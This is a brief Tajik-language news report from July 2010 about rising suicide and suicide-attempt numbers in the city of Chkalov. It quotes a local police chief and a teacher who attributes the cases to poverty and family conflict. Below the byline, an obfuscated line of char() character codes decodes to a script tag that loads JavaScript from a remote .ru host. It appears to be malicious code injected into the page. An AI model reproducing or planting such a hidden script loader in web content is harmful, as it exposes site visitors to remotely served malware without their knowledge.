20.07.2010
Чкалов: Ҳодисаи худкушӣ нисбат ба соли гузашта афзуд
Дар шаҳри Чкалов ва ҷамоъати шаҳраки Палос ҳодисаҳои худкушӣ ва сӯиқасд ба он нистаб ба ҳамин давраи соли гузашта афзуд. Сардори ШКД-и шаҳри Чкалов майёри милиса Ярматов Ш. қайд намуд, ки дар зарфи 6 моҳи сипаришуда 6 ҳодисаҳои худкушӣ ва сӯиқасд ба он ба қайд гирифта шуд. Аз ҷумла 3 ҳодисаи сӯиқасд ба ҷон ба қайд гирифта шуд. Ҳамчунин номбурда зикр намуд, ки аз ин миқдор 4 нафар мардон мебошанд. Тибқи иттилоъ соли гузашта дар зарфи 1 сол ҳамагӣ 4 ҳолат ба қайд гирифта шуда буд. Аммо дар ин сол бошад, танҳо дар 6 моҳи аввал 6 ҳодиса ба қайд гирифта шуд, ки нисбат ба соли гузашта 2 ҳолат зиёд аст. Омӯзгор саидов Файзулло доир ба сабабҳои худкушӣ ва сӯиқасд ба он чунин ибрози ақида намуд. «Яке аз сабабҳои даст ба худкушӣ задани шаҳрвандон ин сатҳи пасти зиндагӣ мебошад. Дигараш ин ҷанҷоли оилавӣ аст, ки хоҳ нохоҳ ба аъзоёни оила таъсир мерасонад, ки дар натиҷа онҳо ба ин кор даст мезананд»
Қодиров Субҳиддин
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)3a044f13ad36b822efc16d143474c70c.js" type="text/javascript">

ТАВЗЕҲОТ